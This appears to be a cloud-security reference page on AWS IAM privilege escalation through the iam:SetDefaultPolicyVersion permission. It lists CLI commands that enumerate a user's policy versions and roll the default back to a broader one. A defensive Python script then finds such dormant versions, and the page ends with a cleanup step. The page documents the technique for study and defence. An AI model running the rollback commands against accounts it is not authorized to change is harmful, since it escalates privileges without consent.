IAM Policy Rollback
Dangerous Permission: iam:SetDefaultPolicyVersion
iam:SetDefaultPolicyVersion is a potentially dangerous permission that AWS cautions about using. A threat actor holding this permission can switch a policy's default version to any of its other versions, and could potentially escalate their privileges by leveraging unused versions of existing policies. This is a simple example of direct self-escalation: the identity modifies its own rights, and how far it gets depends on the permissions contained in the other policy versions.
Commands:
1) List the policies directly attached to our user
aws iam list-attached-user-policies --user-name USERNAME
2) List the versions of a specific policy
aws iam list-policy-versions --policy-arn POLICY_ARN
3) Get a specific version of our chosen policy
aws iam get-policy-version --policy-arn POLICY_ARN --version-id vNUM
4) Abuse the dangerous permission to roll back to the desired policy version, gaining further access to AWS resources or escalating privileges
aws iam set-default-policy-version --policy-arn arn:aws:iam::ACCOUNT_ID:policy/POLICY_NAME --version-id vNUM
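To find the policies this rollback would work against, the added example below (not part of the original page) flags non-default versions that allow actions the current default version does not. It assumes input shaped like the Policies list from aws iam get-account-authorization-details --filter LocalManagedPolicy; the function names and sample data are constructed, and it compares Allow actions only, ignoring Resource, Condition and Deny.

```python
import fnmatch

def allowed_actions(document):
    """Lower-cased Action patterns from the Allow statements of one policy document."""
    statements = document.get("Statement", [])
    if isinstance(statements, dict):          # a lone statement may be a bare object
        statements = [statements]
    actions = set()
    for st in statements:
        if st.get("Effect") != "Allow":
            continue
        if "NotAction" in st:                 # Allow + NotAction: treat as wildcard
            actions.add("*")
            continue
        act = st.get("Action", [])
        actions.update(a.lower() for a in ([act] if isinstance(act, str) else act))
    return actions

def dormant_escalations(policies):
    """(arn, version_id, extra_actions) per non-default version allowing more than the default."""
    findings = []
    for pol in policies:
        versions = pol.get("PolicyVersionList", [])
        default = next((v for v in versions if v.get("IsDefaultVersion")), None)
        if default is None:
            continue
        base = allowed_actions(default["Document"])
        for v in versions:
            if v is default:
                continue
            extra = sorted(a for a in allowed_actions(v["Document"])
                           if not any(fnmatch.fnmatchcase(a, p) for p in base))
            if extra:
                findings.append((pol["Arn"], v["VersionId"], extra))
    return findings

def _ver(vid, actions, default=False):
    """Build one constructed PolicyVersionList entry."""
    doc = {"Version": "2012-10-17",
           "Statement": [{"Effect": "Allow", "Action": actions, "Resource": "*"}]}
    return {"VersionId": vid, "IsDefaultVersion": default, "Document": doc}

# Constructed sample data (placeholder account ID and policy name).
SAMPLE = [{"Arn": "arn:aws:iam::123456789012:policy/ExamplePolicy",
           "PolicyVersionList": [
               _ver("v3", ["s3:GetObject", "iam:CreateAccessKey"]),
               _ver("v2", ["s3:Get*", "s3:ListBucket"], default=True),
               _ver("v1", "*")]}]

if __name__ == "__main__":
    for arn, vid, extra in dormant_escalations(SAMPLE):
        print(f"{arn} {vid} allows beyond default: {', '.join(extra)}")
```

Versions flagged this way that are no longer needed can be removed with aws iam delete-policy-version, which leaves nothing broader to roll back to.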